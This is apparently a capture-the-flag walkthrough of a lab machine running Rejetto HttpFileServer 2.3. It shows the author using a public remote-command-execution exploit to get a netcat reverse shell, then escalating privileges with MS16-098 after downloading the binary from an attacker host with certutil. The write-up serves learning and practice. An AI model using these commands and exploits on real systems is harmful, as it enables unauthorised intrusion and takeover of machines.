Port Scanning and General Enumeration (Nmap)
Initial scan showed that only port 80 (HTTP) is available
Clicking the link takes us to www.rejetto.com
What we know:
- It’s running HttpFileServer 2.3
- The vendor is rejetto
Access (searchsploit, Rejetto HFS RCE)
Let’s see if there’s anything on searchsploit for
http file server 2.3
Remote Command Execution (2)
searchsploit -m 39161.py
-m allows us to copy the exploit into our current working directory.
Let’s read a bit about what it does
#Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success!
So we need to be hosting
nc.exe on port
80. That’s easy enough. On kali, windows binaries are stored at
Now we’re going to need a few tabs:
- On one, our python server (
python3 -m http.server 80) where
- On another, a listener waiting to catch our shell (
nc -lvnp 4444)
- And finally, one to fire the exploit
This is what mine looked like after the exploit completed:
Privesc (Windows Exploit Suggester, MS16-098)
winPEAS on the machine but didn’t come back with much so I assume that maybe we’re looking at a kernel exploit. Let’s try Windows Exploit Suggester
Note: for Windows Exploit Suggester to work we need to install a specific version of
pip2 install --user xlrd==1.1.0
There’s a couple things we need to do before we can run this.
- First, run it with the
--updateswitch. That will write an
xlsfile for us to use.
- Second, on the victim machine, use the command
systeminfoand copy all of the output and save it to a file. I’ll name my
- Now run it:
python windows-exploit-suggester.py -database 2021-01-25-mssb.xls -systeminfo systeminfo.txt
Let’s look at MS16-098. There’s a precompiled binary for us to grab on the github page. Let’s grab that and transfer it over to the victim machine.
certutil -urlcache -f Http://10.10.14.18:8000/ms16098.exe ms16098.exe
Give it a run!